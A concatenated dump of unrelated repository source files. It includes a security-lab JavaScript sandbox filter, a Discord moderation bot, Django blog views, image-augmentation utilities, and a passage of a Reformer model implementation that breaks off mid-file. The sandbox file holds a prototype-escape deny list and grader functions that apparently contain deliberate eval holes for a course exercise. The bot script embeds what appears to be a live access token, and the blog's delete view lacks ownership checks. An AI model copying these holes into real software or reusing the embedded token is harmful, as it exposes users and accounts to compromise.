21d5d25107671e5c852f9645f6c319c98f3cabca | 32fff3cac41691e7ef76bd48d575c74e7102e861 | /Lab6/htmlfilter.py | b838656b8ff34f2e189a5da93ec40aafa495ded4 | [] | no_license | ukk1/ITKST53 | 6afbe31ebf014033829e874f912bb7fa359fd3f2 | 20f3509807fc557e9564193f2822f2bbe64714fa | refs/heads/master | 2020-04-06T07:10:50.969155 | 2016-08-31T16:28:57 | 2016-08-31T16:28:57 | 60,543,895 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,338 | py | import lxml.html
import lxml.html.clean
import slimit.ast
import slimit.parser
import lab6visitor
from debug import *
libcode = '''
<script>
var sandbox_document = {
getElementById: function(id) {
var e = document.getElementById('sandbox-' + id);
return {
get onclick() { return e.onclick; },
set onclick(h) { e.onclick = h; },
get textContent() { return e.textContent; },
set textContent(h) { e.textContent = h; },
}
},
};
// Do not change these functions.
function sandbox_grader(url) {
window.location = url;
}
function sandbox_grader2() {
eval("1 + 1".toString()); // What could possibly go wrong...
}
function sandbox_grader3() {
try {
eval(its_okay_no_one_will_ever_define_this_variable);
} catch (e) {
}
}
function sandbox_setTimeout(s, sec) {
if (typeof s == "function") {
t = eval(s);
setTimeout(t, sec);
}
}
function includes(k) {
for(var i=0; i < this.length; i++){
if( this[i] === k || ( this[i] !== this[i] && k !== k ) ){
return true;
}
}
return false;
}
var badwords = ["__proto__", "constructor", "__defineGetter__", "__defineSetter__"];
badwords.includes = includes;
function badword_check(s) {
if (badwords.includes(s)) {
return '__invalid__';
}
return s;
}
function this_check(s) {
if (s === window) return null;
return s;
}
</script>
'''
def filter_html_cb(s, jsrewrite):
    """Sanitize an HTML string, rewriting scripts through *jsrewrite*.

    Styles are stripped; <script> elements are kept but their text is passed
    through *jsrewrite*. All attributes are removed from every element, and
    any element id is re-attached under the "sandbox-" prefix that the
    libcode shim looks elements up by.
    """
    cleaner = lxml.html.clean.Cleaner()
    cleaner.scripts = False   # keep <script> so we can rewrite, not drop, them
    cleaner.style = True
    doc = lxml.html.fromstring(s)
    clean = cleaner.clean_html(doc)
    for el in clean.iter():
        if el.tag == 'script':
            el.text = jsrewrite(el.text)
        # Remember the id (if any) before stripping attributes. The original
        # checked "'id' in el.attrib" *after* deleting every attribute, so
        # the sandbox- prefix was never applied.
        el_id = el.attrib.get('id')
        # Iterate over a snapshot: deleting from the live attrib mapping
        # while iterating it is unsafe.
        for a in list(el.attrib):
            del el.attrib[a]
        if el_id is not None:
            el.attrib['id'] = 'sandbox-' + el_id
    return lxml.html.tostring(clean)
@catch_err
def filter_js(s):
    """Parse untrusted JavaScript and rewrite it via the lab visitor."""
    ast_root = slimit.parser.Parser().parse(s)
    return lab6visitor.LabVisitor().visit(ast_root)
@catch_err
def filter_html(s):
    """Return the sandbox helper script followed by the filtered page."""
    filtered = filter_html_cb(s, filter_js)
    return libcode + filtered
| [
"bldr86@gmail.com"
] | bldr86@gmail.com |
bfb960beefa750bcc845e2efc49507af9740647a | 52a61caff0aeb434c32e5657e38762643e9f57dd | /DataStructuresAndAlgorithms/SearchAndSort/Search/BinarySearch/functionBinarySearch.py | 6a7e15608caca8460acd2988b9f9a53c5f770492 | [] | no_license | AndrewErmakov/PythonTrainingBasics | 1480a6378d1ec59884760e2b3014ccc3d28f058f | 639e15bbfc54da762cb9e366497754cfece30691 | refs/heads/master | 2021-06-10T15:57:58.682335 | 2021-03-25T13:37:30 | 2021-03-25T13:37:30 | 153,678,760 | 0 | 0 | null | 2018-10-30T13:52:51 | 2018-10-18T19:45:47 | Python | UTF-8 | Python | false | false | 596 | py | def binary_search(list_num: list, number: int) -> int:
"""Выводит индекс значения, которое мы ищем, иначе выводится НЕ НАЙДЕНО"""
low_border = 0
high_border = len(list_num) - 1
while low_border <= high_border:
mid = low_border + (high_border - low_border) // 2
guess = list_num[mid]
if guess == number:
return mid
if guess > number:
high_border = mid - 1
else:
low_border = mid + 1
return None
# Demo: 3 is at index 1 in the sample list.
print(binary_search([1, 3, 5, 7, 9], 3))
| [
"andrew.67@list.ru"
] | andrew.67@list.ru |
b3e4aaa0bed41cbfe87730b8ee3df312b46f9aba | b590cf6a5c1fffd9c05a6d27462b472854b93fe6 | /utils/transformations.py | 45d7478a7130343949d498d5c301ac1acf31fbb4 | [
"MIT"
] | permissive | CarolMazini/Manifold-Learning-for-Real-World-Event-Understanding | 344f4e01438570ab710e1e1dc187386f20072d94 | 36151165f0ce23c168b893a9e916023b34630cf3 | refs/heads/main | 2023-04-15T13:52:01.063661 | 2021-04-16T08:49:41 | 2021-04-16T08:49:41 | 350,513,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,789 | py | from tqdm import tqdm
import time
import numpy as np
import scipy as sc
from sys import argv
import math
from sklearn import metrics
import shutil
import random
from PIL import Image
import PIL
import cv2
import os
import imutils
#performs a random rotation within [-angle_max, angle_max] degrees
def random_rotate_images(image, angle_max):
	'''
	input: image to be rotated, maximum angle to perform rotation (both sides)
	output: rotated image, angle of rotation
	'''
	# Draw a whole-degree angle (possibly negative) and apply it.
	chosen_angle = random.randint(-angle_max, angle_max)
	rotated = imutils.rotate(image, angle=chosen_angle)
	return rotated, chosen_angle
#performs a random zoom in
def random_zoom(cv2Object, zoom_size_max):
	'''
	input: image as an cv2 object, maximum zoom
	output: image with zoom in, zoom value
	'''
	# Pick a zoom factor in [1.0, zoom_size_max]; 1.0 means no zoom.
	zoom_factor = random.uniform(1.0, zoom_size_max)
	# Enlarge the canvas by the chosen factor...
	enlarged = imutils.resize(cv2Object, width=int(zoom_factor * cv2Object.shape[1]))
	# ...then crop a window around the centre of the enlarged frame, which
	# produces the zoom-in effect. (cy, cx) is the centre (y/2, x/2).
	cy, cx = enlarged.shape[0] // 2, enlarged.shape[1] // 2
	# (top, left) corner of the kept window, scaled down by the zoom factor.
	top, left = int(cy / zoom_factor), int(cx / zoom_factor)
	zoomed = enlarged[top:(cy + top), left:(cx + left)]
	return zoomed, zoom_factor
#performs random crop according to a specified size
def random_crop(img, random_crop_size):
	'''
	input: image to be cropped (H x W x 3 array), expected (height, width) of the crop
	output: cropped image as a float64 array, x offset, y offset
	'''
	# Note: image_data_format is 'channel_last'
	assert img.shape[2] == 3
	height, width = img.shape[0], img.shape[1]
	dy, dx = random_crop_size
	# randint is inclusive at both ends, so the largest valid top-left corner
	# is (width - dx, height - dy). The original used "+ 1", which could put
	# the window one pixel past the edge and return an undersized crop.
	x = random.randint(0, width - dx)
	y = random.randint(0, height - dy)
	# np.float was removed in NumPy 1.24; the builtin float gives float64.
	img = img.astype(float)
	return img[y:(y+dy), x:(x+dx), :], x, y
#read images from a list of filenames, crop them and save in a directory
def crop_generator(images, crop_length, name_base):
	'''
	input: list of image filenames to be cropped, expected crop size (currently
	unused: each image is cropped to half its height/width), name_base of the
	save directory
	output: ---
	'''
	for filename in images:
		# imread returns None for missing/unreadable paths; the except below
		# then skips that file.
		image = cv2.imread(filename)
		try:
			height, width = image.shape[0], image.shape[1]
			crop_height = height//2
			crop_width = width//2
			img, x, y = random_crop(image, (crop_height, crop_width))
			# Flatten "<dir>/<file>" into "<dir>-<file>" for a unique output name.
			filename = filename.split('/')[-2]+'-'+filename.split('/')[-1]
			out_name = name_base + 'cropped'+filename.split('.')[0]+'-'+str(x)+'-'+str(y)+'.png'
			print(out_name)
			cv2.imwrite(out_name, img)
		except Exception as exc:
			# Best-effort batch: report the failure and keep going (the
			# original bare "except: pass" hid every error, including bugs).
			print('crop_generator: skipping %s (%s)' % (filename, exc))
#read images from a list of filenames, zoom in and save in a directory
def zoom_generator(images, zoom_size_max, name_base):
	'''
	input: list of image filenames to be zoomed in, maximum zoom factor,
	name_base of the save directory
	output: ---
	'''
	for filename in images:
		# imread returns None for missing/unreadable paths; the except below
		# then skips that file.
		image = cv2.imread(filename)
		try:
			img, x = random_zoom(image, zoom_size_max)
			# Flatten "<dir>/<file>" into "<dir>-<file>" for a unique output name.
			filename = filename.split('/')[-2]+'-'+filename.split('/')[-1]
			out_name = name_base + 'zoomIn'+filename.split('.')[0]+'-'+str(x)+'.png'
			print(out_name)
			cv2.imwrite(out_name, img)
		except Exception as exc:
			# Best-effort batch: report the failure and keep going instead of
			# silently swallowing every error.
			print('zoom_generator: skipping %s (%s)' % (filename, exc))
#read images from a list of filenames, rotate each by a random angle (up to
#angle_max degrees either way) and save the results in a directory
def rotation_generator(images, angle_max, name_base):
	'''
	input: list of image filenames to be rotated, maximum rotation angle
	(both directions), name_base of the save directory
	output: ---
	'''
	for filename in images:
		# imread returns None for missing/unreadable paths; the bare except
		# below silently skips those (and, unfortunately, any other error).
		image = cv2.imread(filename)
		try:
			img, x = random_rotate_images(image, angle_max)
			# save a image using extension
			filename = filename.split('/')[-2]+'-'+filename.split('/')[-1]
			print(name_base + 'rotated'+filename.split('.')[0]+'-'+str(x)+'.png')
			cv2.imwrite(name_base + 'rotated'+filename.split('.')[0]+'-'+str(x)+'.png',img)
		except:
			pass | [
"carolinemazinirodrigues@hotmail.com"
] | carolinemazinirodrigues@hotmail.com |
00897337ef29542e1c4328ecc6528ae53b6c399f | de9da1acee9c6b7e899efe8adf83ae0b29fc2ad3 | /src/run.py | 1521c7d5049b918c40431f9348d2f844f6d32c50 | [
"MIT"
] | permissive | CristianContrera95/FaceDetectAPI | 646518cbc1d24898904a723a7333f6a27edacb0b | 49cc896e8eddbf26b406d75325f9b38dba532e2b | refs/heads/master | 2022-12-09T20:26:15.448061 | 2020-08-27T13:48:03 | 2020-08-27T13:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from app import app
from config import ENVIRONMENT, PORT
if __name__ == '__main__':
if ENVIRONMENT == 'dev':
app.run(host='0.0.0.0', port=PORT, debug=True)
else:
app.run(host='0.0.0.0', port=PORT, debug=False)
| [
"cristiancontrera95@gmail.com"
] | cristiancontrera95@gmail.com |
06b82317f341de041aa076425ac0ea6a0b157357 | fdb9b553a23647f7ea06f690613707c40b54902f | /src/main/resources/resource/LocalSpeech/LocalSpeech.py | 3c699a5680887399d9993fd401bcfa08d5ebce64 | [
"CC-BY-2.5",
"Apache-2.0"
] | permissive | ShaunHolt/myrobotlab | d8d9f94e90457474cf363d36f4a45d396cfae900 | 92046d77abd560f0203050b3cccb21aa9df467f2 | refs/heads/develop | 2021-07-08T04:55:01.462116 | 2020-04-18T19:58:17 | 2020-04-18T19:58:17 | 122,795,957 | 0 | 0 | Apache-2.0 | 2020-04-18T19:58:18 | 2018-02-25T01:37:54 | Java | UTF-8 | Python | false | false | 886 | py | #########################################
# LocalSpeech.py
# description: used as a general template
# categories: speech
# more info @: http://myrobotlab.org/service/LocalSpeech
#########################################
# start the service
# Start a LocalSpeech service instance named 'mouth' via the MyRobotLab Runtime.
mouth = Runtime.start('mouth','LocalSpeech')
#possible voices ( selected voice is stored inside config until you change it )
print ("these are the voices I can have", mouth.getVoices())
print ("this is the voice I am using", mouth.getVoice())
# ( macOs )
# set your voice from macos control panel
# you can test it using say command from terminal
# mouth.setVoice("Microsoft Zira Desktop - English (United States)")
mouth.speakBlocking(u"Hello this is an english voice")
# French sentence with accented characters to exercise non-ASCII handling.
mouth.speakBlocking(u"Bonjour ceci est une voix française, je teste les accents aussi avec le mot éléphant")
# lower the volume before the last utterance
mouth.setVolume(0.7)
mouth.speakBlocking("Silent please")
"grog@myrobotlab.org"
] | grog@myrobotlab.org |
eecfd2976b90f621a274ce0bcb1917b8a3f72bb2 | 8a91561ea2f82376f653a001f642d1a32234b6d0 | /bot.py | c7683d20b5701a5c577bd77ddc77720c37529f60 | [] | no_license | SumitKumar1307/Lightning | 8cf6adfbc5c264c6e86de7fb2c84a333b3873cbd | 7052948c77381b0209865758f33f45ddb48f39fd | refs/heads/main | 2023-02-23T16:01:58.518177 | 2021-01-25T11:35:10 | 2021-01-25T11:35:10 | 332,725,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,692 | py | import discord
intents = discord.Intents.default()
intents.members = True
client = discord.Client(intents=intents)
@client.event
async def on_ready():
print(f"{client.user} connected to Discord")
@client.event
async def on_member_remove(member):
print("Someone left")
member_name = str(member)
member_name = member_name[:member_name.index("#")]
embed = discord.Embed(title=f"{member_name} Left!", description=f"We're sorry to say good bye, hope"
f" we will see you soon"
f" {member.mention}")
channel = client.get_channel(802143961031507968)
await channel.send(embed=embed)
@client.event
async def on_member_join(member):
member_name = str(member)
member_name = member_name[:member_name.index("#")]
print("Someone joined")
channel = client.get_channel(797412497589927937)
embed = discord.Embed(title=f"Welcome {member_name}",
description=f"Welcome {member_name}, hope you will have a nice"
" time will you're here")
await channel.send(embed=embed)
@client.event
async def on_message(message):
message_content = str(message.content)
restricted_words = ['fuck', 'dick', 'ass', 'motherfucker', 'pussy', 'moron', 'bitch']
for restricted_word in restricted_words:
if restricted_word in message_content.lower():
embed = discord.Embed(title="Message Removal", description=f"Hey {message.author.mention}, I wanted to let"
f" you know you know that your message has been"
f" removed because of use of inappropriate words"
f". If you think that this was a mistake please"
f" contact the administrators of the server.")
await message.author.send(embed=embed)
await message.delete()
else:
if message_content.startswith("!"):
if message_content == "!hello":
await message.channel.send(f"Hey {message.author.mention}")
elif message_content == "!my_messages":
no_of_messages = 0
async for msg in client.get_channel(message.channel.id).history():
if msg.author == message.author:
print(msg.content)
no_of_messages += 1
embed = discord.Embed(title="Number of Messages", description=f"Hey {message.author.mention}, "
f"According to our records you have sent a"
f" total of {no_of_messages} to this channel")
await message.channel.send(embed=embed)
if message_content == "!latest_events":
events_channel = client.get_channel(802144608464404520)
async for msg in events_channel.history():
if msg.embeds:
await message.channel.send(embed=msg.embeds[0])
break
else:
await message.channel.send(msg.content)
break
client.run("ODAyNDU1NzIxMjQ0MzYwNzI1.YAvfIA.OGZv2fkku8Z88Ny_bQ6XL6pmmXM")
| [
"noreply@github.com"
] | SumitKumar1307.noreply@github.com |
8dbc45ff6c19e23b02c3d083b54c1e91f05af6d0 | 10abbbca6e0f3f0939bef436b41dfd1511c9480b | /post/views.py | 6b9883dff1390cfeefe5bd853589ead2bd367751 | [] | no_license | TrellixVulnTeam/blog_QJAD | 727f306001abe083c98a5c10277a1158170d61dd | d061442d41b985df11e6c6eac4e602818c0f9443 | refs/heads/master | 2023-03-17T12:50:38.497215 | 2019-02-21T15:12:45 | 2019-02-21T15:12:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,867 | py | # -*- encoding: utf-8 -*-
from django.shortcuts import render, HttpResponse, get_object_or_404, HttpResponseRedirect, redirect, Http404
from .models import Post
from .forms import PostForm, CommentForm
from django.contrib import messages
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.utils.text import slugify
from django.db.models import Q
def post_index(request):
    """List all posts, optionally filtered by the ``q`` search parameter,
    paginated 5 per page via the ``page`` query parameter."""
    post_list = Post.objects.all()

    query = request.GET.get('q')
    if query:
        # Match the query against title, content or the author's name;
        # distinct() avoids duplicate rows from the joined user table.
        post_list = post_list.filter( Q(title__icontains=query) |
                                      Q(content__icontains=query) |
                                      Q(user__first_name__icontains=query) |
                                      Q(user__last_name__icontains=query)
                                    ).distinct()

    paginator = Paginator(post_list, 5)
    page = request.GET.get('page')
    try:
        posts = paginator.page(page)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        posts = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999), deliver last page of results.
        posts = paginator.page(paginator.num_pages)

    context = {
        'posts' : posts
    }
    return render(request, 'post/index.html', context)
def post_create(request):
    """Create a new post (authenticated users only).

    On GET (or invalid POST) renders the empty/bound form; on valid POST
    saves the post with the current user as author and redirects to it.
    """
    if not request.user.is_authenticated():
        messages.error(request, "Bu islem icin yetkiniz yok !")
        return post_index(request)
    # (Earlier manual request.POST handling and the explicit GET/POST form
    # branching were superseded by the single PostForm call below, which
    # binds POST data and files when present and an empty form otherwise.)
    form = PostForm(request.POST or None, request.FILES or None)
    if form.is_valid():
        # commit=False so the author can be attached before the DB write.
        post = form.save(commit=False)
        post.user = request.user
        post.save()
        messages.success(request, "Post basarili bir sekilde olusturuldu !")
        return HttpResponseRedirect(post.get_absolute_url())
    context = {
        'form': form
    }
    return render(request, 'post/create.html', context)
def post_delete(request, slug):
    """Delete the post identified by ``slug`` and redirect to the index.

    NOTE(review): deletes on a plain GET with no confirmation step and no
    ownership check (any authenticated user can delete any post) -- confirm
    this is intended.
    """
    if not request.user.is_authenticated():
        messages.error(request, "Bu islem icin yetkiniz yok !")
        return post_index(request)
    post = get_object_or_404(Post, slug=slug)
    post.delete()
    messages.success(request, 'Post basarili bir sekilde silindi.')
    return redirect('post:index')
def post_update(request, slug):
    """Edit an existing post (authenticated users only).

    Binds the form to the existing instance; on valid POST saves and
    redirects to the post, otherwise re-renders the create template.
    """
    if not request.user.is_authenticated():
        messages.error(request, "Bu islem icin yetkiniz yok !")
        return post_index(request)
    post = get_object_or_404(Post, slug=slug)
    # instance=post makes this an update rather than a create.
    form = PostForm(request.POST or None, request.FILES or None, instance=post)
    if form.is_valid():
        post = form.save()
        messages.success(request, "Post basarili bir sekilde guncellendi !")
        return HttpResponseRedirect(post.get_absolute_url())
    context = {
        'form': form
    }
    # reuses the create template for editing
    return render(request, 'post/create.html', context)
def post_detail(request, slug):
    """Render a single post and process its comment form.

    A valid POST attaches the new comment to the post, flashes a success
    message and redirects back to the post's page.
    """
    post = get_object_or_404(Post, slug=slug)
    comment_form = CommentForm(request.POST or None)
    if comment_form.is_valid():
        new_comment = comment_form.save(commit=False)
        new_comment.post = post
        new_comment.save()
        messages.success(request, "Yorum basarili bir sekilde eklendi !")
        return HttpResponseRedirect(post.get_absolute_url())
    return render(request, 'post/detail.html', {
        'post': post,
        'form': comment_form,
    })
| [
"bilal.kocoglu@outlook.com.tr"
] | bilal.kocoglu@outlook.com.tr |
024b9ada66b4ee856c4d8280dcc378ff861efede | 0d53ed17c625bf2c0293cad39fafc2edfa089b2a | /main_app/migrations/0002_piece_user.py | 6378be263835cfe24e68ec79c12e8d8cbd26ce1a | [] | no_license | aaalexandriaaa/sforzando | 0fae6b1ca62b94348fdd8b9e63f2cdb65bbbe9d6 | 17c3494da7458080f19761c5d2cfe55ff97edbe8 | refs/heads/main | 2023-08-04T23:54:01.416602 | 2020-10-16T14:26:08 | 2020-10-16T14:26:08 | 302,711,668 | 0 | 0 | null | 2021-09-22T19:36:59 | 2020-10-09T17:35:53 | Python | UTF-8 | Python | false | false | 598 | py | # Generated by Django 3.1.2 on 2020-10-11 21:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('main_app', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='piece',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='auth.user'),
preserve_default=False,
),
]
| [
"67809768+aaalexandriaaa@users.noreply.github.com"
] | 67809768+aaalexandriaaa@users.noreply.github.com |
c47cbf1c998f0c06d74faf1cdd1bc8ef5fc26fcf | f46fcb4f1a1eba8e18f0aeecc858f2f9da8222f0 | /venv/bin/python-config | aa1a21e7d179ec6ef46a96533d16d37f040a3065 | [
"MIT"
] | permissive | miket430/DjangoChannels | ba3d362eeee510cf8a4acab60b460b7e8cdbcac4 | bd772ce29fc3ead2b3286a86374b37729a6b6577 | refs/heads/master | 2021-01-19T15:16:44.337613 | 2017-04-15T21:24:30 | 2017-04-15T21:24:30 | 88,209,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,371 | #!/home/mike/Projects/webRTC/DjangoChannels/mysite/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"280749941@qq.com"
] | 280749941@qq.com | |
474938eddcd278b842c02f4bc13beab9969ae5d4 | cbf448f9fa287b38a6b175040141e9ee445cfcd1 | /DNN_3L/evaluation_matrics.py | cbb95bef1984a401aac76d2f267d039a67d8c78a | [] | no_license | rnaimehaom/SST-Result | 271c115d6ab1f14265169d98f604d4a63c71184e | 829029b060010b2928032b3d6728c660b538b5cf | refs/heads/main | 2023-03-27T23:17:53.935109 | 2021-04-09T02:49:58 | 2021-04-09T02:49:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 15:39:34 2020
@author: tanzheng
"""
import pickle
import numpy as np
def _rrmse(y_true, y_pred):
    """Relative RMSE: root of (sum of squared residuals / total squared
    deviation of the targets from their mean)."""
    resid = np.sum(np.square(y_true - y_pred))
    spread = np.sum(np.square(y_true - np.mean(y_true)))
    return np.sqrt(resid / spread)


# Load the (first-stage preds, second-stage preds, ground truth, task names)
# tuple produced by the DNN_3L SST prediction script.  The explicit f.close()
# of the original was redundant -- the ``with`` block already closes the file.
with open('DNN_3L_SST_predict.pkl', 'rb') as f:
    MT_predict_result = pickle.load(f)

first_pred_out_y, second_pred_out_y, out_prop_y, tasks = MT_predict_result

No_samples = out_prop_y.shape[0]

# Stack the per-task column arrays into (n_samples, n_tasks) matrices.
np_fir_pred_out_y = np.empty(shape=(No_samples, 0))
np_sec_pred_out_y = np.empty(shape=(No_samples, 0))

for i in range(len(first_pred_out_y)):
    np_fir_pred_out_y = np.hstack((np_fir_pred_out_y, first_pred_out_y[i]))
    np_sec_pred_out_y = np.hstack((np_sec_pred_out_y, second_pred_out_y[i]))

# target RRMSE
# single target (first-stage predictions)
single_task_RRMSE = [
    _rrmse(out_prop_y[:, i], np_fir_pred_out_y[:, i]) for i in range(len(tasks))
]

# multi target (second-stage predictions)
multi_task_RRMSE = [
    _rrmse(out_prop_y[:, i], np_sec_pred_out_y[:, i]) for i in range(len(tasks))
]
"noreply@github.com"
] | rnaimehaom.noreply@github.com |
db30ff6125e8ba725f70fa409f394ad7acaaeaff | 570e773112f03048fc4080a066f1ab8bdd87f288 | /reverse.py | f02f982753f3171ed326e5818b91db0fb0e03244 | [] | no_license | shuvendra4228/learn-python | c0da1e0ea7188a80d97b39b933e4278f8321db10 | c61368db0064455104b13f1d6d23df24a64e8b61 | refs/heads/master | 2021-09-04T02:25:47.969362 | 2018-01-14T16:43:42 | 2018-01-14T16:43:42 | 115,523,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | S = input('enter a string:')
S1=''
for i in range (len(S)):
S1+=S[-(i+1)]
print(S1)
| [
"shuvendra4227@gmail.com"
] | shuvendra4227@gmail.com |
9d9c04e3d472a5fab525b52426f395ff9458ce80 | 3a9e81f9a154aa53db2b62b84e0218e4b1dccbac | /src/transformers/modeling_reformer.py | 6049dc3ed0863b49c3bd71fd51cdf48eeaee2157 | [
"Apache-2.0"
] | permissive | toriving/transformers | c3d5b892c367bfbd857e41a50cd839b03b7ce90b | 2f2aa0c89cab9a77560e6845578f917a61081c67 | refs/heads/master | 2020-08-10T10:27:10.610417 | 2020-08-06T15:47:32 | 2020-08-06T15:47:32 | 214,324,448 | 0 | 0 | Apache-2.0 | 2019-10-11T02:18:03 | 2019-10-11T02:18:03 | null | UTF-8 | Python | false | false | 109,637 | py | # coding=utf-8
# Copyright 2020 The Trax Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch REFORMER model. """
import logging
import sys
from collections import namedtuple
from dataclasses import dataclass
from functools import reduce
from operator import mul
from typing import List, Optional, Tuple
import numpy as np
import torch
from torch import nn
from torch.autograd.function import Function
from torch.nn import CrossEntropyLoss, MSELoss
from .activations import gelu, gelu_fast, gelu_new, swish
from .configuration_reformer import ReformerConfig
from .file_utils import (
DUMMY_INPUTS,
DUMMY_MASK,
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_callable,
)
from .modeling_outputs import CausalLMOutput, MaskedLMOutput, QuestionAnsweringModelOutput, SequenceClassifierOutput
from .modeling_utils import PreTrainedModel, apply_chunking_to_forward
logger = logging.getLogger(__name__)

# Names referenced by the documentation decorators imported above.
_CONFIG_FOR_DOC = "ReformerConfig"
_TOKENIZER_FOR_DOC = "ReformerTokenizer"

# Pretrained checkpoints known to be compatible with this architecture.
REFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "google/reformer-crime-and-punishment",
    "google/reformer-enwik8",
    # See all Reformer models at https://huggingface.co/models?filter=reformer
]
def mish(x):
    """Mish activation: ``x * tanh(softplus(x))`` (Misra, 2019)."""
    softplus_x = nn.functional.softplus(x)
    return x * torch.tanh(softplus_x)
# Maps activation-function names (as used in model configs) to callables;
# gelu variants and swish are imported from .activations above.
ACT2FN = {
    "gelu": gelu,
    "relu": torch.nn.functional.relu,
    "swish": swish,
    "gelu_new": gelu_new,
    "gelu_fast": gelu_fast,
    "mish": mish,
}
# Define named tuples for nn.Modules here
# Lightweight structured return types for the attention / layer modules;
# named tuples keep multi-value returns self-describing without the overhead
# of full output dataclasses.
LSHSelfAttentionOutput = namedtuple("LSHSelfAttentionOutput", ["hidden_states", "attention_probs", "buckets"])
LocalSelfAttentionOutput = namedtuple("LocalSelfAttentionOutput", ["hidden_states", "attention_probs"])
AttentionOutput = namedtuple("AttentionOutput", ["hidden_states", "attention_probs", "buckets"])
ReformerOutput = namedtuple("ReformerOutput", ["hidden_states", "attn_output", "attention_probs", "buckets"])
# Used by the reversible-residual backward pass to carry gradients.
ReformerBackwardOutput = namedtuple(
    "ReformerBackwardOutput", ["attn_output", "hidden_states", "grad_attn_output", "grad_hidden_states"]
)
ReformerEncoderOutput = namedtuple(
    "ReformerEncoderOutput", ["hidden_states", "all_hidden_states", "all_attentions", "past_buckets_states"],
)
def _stable_argsort(vector, dim):
# this function scales the vector so that torch.argsort is stable.
# torch.argsort is not stable on its own
scale_offset = torch.arange(vector.shape[dim], device=vector.device).view(1, 1, -1)
scale_offset = scale_offset.expand(vector.shape)
scaled_vector = vector.shape[dim] * vector + (scale_offset % vector.shape[dim])
return torch.argsort(scaled_vector, dim=dim)
def _get_least_common_mult_chunk_len(config):
attn_types = config.attn_layers
attn_types_set = set(attn_types)
if len(attn_types_set) == 1 and attn_types[0] == "lsh":
return config.lsh_attn_chunk_length
elif len(attn_types_set) == 1 and attn_types[0] == "local":
return config.local_attn_chunk_length
elif len(attn_types_set) == 2 and attn_types_set == set(["lsh", "local"]):
return np.lcm(config.lsh_attn_chunk_length, config.local_attn_chunk_length)
else:
raise NotImplementedError(
"Only attn layer types 'lsh' and 'local' exist, but `config.attn_layers`: {}. Select attn layer types from ['lsh', 'local'] only.".format(
config.attn_layers
)
)
def _get_min_chunk_len(config):
attn_types = config.attn_layers
attn_types_set = set(attn_types)
if len(attn_types_set) == 1 and attn_types[0] == "lsh":
return config.lsh_attn_chunk_length
elif len(attn_types_set) == 1 and attn_types[0] == "local":
return config.local_attn_chunk_length
elif len(attn_types_set) == 2 and attn_types_set == set(["lsh", "local"]):
return min(config.lsh_attn_chunk_length, config.local_attn_chunk_length)
else:
raise NotImplementedError(
"Only attn layer types 'lsh' and 'local' exist, but `config.attn_layers`: {}. Select attn layer types from ['lsh', 'local'] only.".format(
config.attn_layers
)
)
class AxialPositionEmbeddings(nn.Module):
    """Constructs axial position embeddings. Useful for very long input
    sequences to save memory and time.

    The position embedding is factorised over the axes of
    ``config.axial_pos_shape``: one learned weight per axis, broadcast and
    concatenated along the feature dimension so that
    sum(axial_pos_embds_dim) == hidden_size.
